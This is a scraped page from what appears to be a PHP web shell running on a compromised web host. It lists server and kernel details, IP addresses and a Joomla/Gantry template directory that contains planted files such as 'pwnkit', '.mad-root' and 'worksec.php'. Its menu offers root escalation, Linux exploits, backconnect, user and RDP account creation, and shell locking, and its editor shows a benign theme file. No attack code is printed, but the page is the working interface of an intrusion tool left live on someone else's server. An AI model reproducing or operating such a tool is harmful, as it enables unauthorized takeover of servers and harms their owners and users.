Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
templates /
it_sanctum /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwx---r-x
blueprints
[ DIR ]
drwx---r-x
config
[ DIR ]
drwx---r-x
custom
[ DIR ]
drwx---r-x
fields
[ DIR ]
drwx---r-x
fonts
[ DIR ]
drwx---r-x
gantry
[ DIR ]
drwx---r-x
html
[ DIR ]
drwx---r-x
images
[ DIR ]
drwx---r-x
includes
[ DIR ]
drwx---r-x
install
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
language
[ DIR ]
drwx---r-x
layouts
[ DIR ]
drwx---r-x
particles
[ DIR ]
drwx---r-x
scss
[ DIR ]
drwx---r-x
uikit
[ DIR ]
drwx---r-x
.htaccess
420
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
component.php
730
B
-rw-r--r--
error.php
950
B
-rw-r--r--
index.php
14.74
KB
-rw-r--r--
install.php
2.98
KB
-rw-r--r--
offline.php
873
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
templateDetails.xml
4.81
KB
-rw----r--
template_preview.png
117.81
KB
-rw----r--
template_thumbnail.png
28.67
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : offline.php
<?php /** * @package Gantry 5 Theme * @author RocketTheme http://www.rockettheme.com * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC * @license GNU/GPLv2 and later * * http://www.gnu.org/licenses/gpl-2.0.html */ defined('_JEXEC') or die; // Bootstrap Gantry framework or fail gracefully (inside included file). $gantry = include __DIR__ . '/includes/gantry.php'; /** @var \Gantry\Framework\Theme $theme */ $theme = $gantry['theme']; ob_start(); include JPATH_THEMES . '/system/offline.php'; $html = ob_get_clean(); $start = strpos($html, '<body>') + 6; $end = strpos($html, '</body>', $start); $context = array( 'message' => substr($html, $start, $end - $start) ); // Reset used outline configuration. unset($gantry['configuration']); // Render the page. echo $theme ->setLayout('_offline') ->render('offline.html.twig', $context);
Close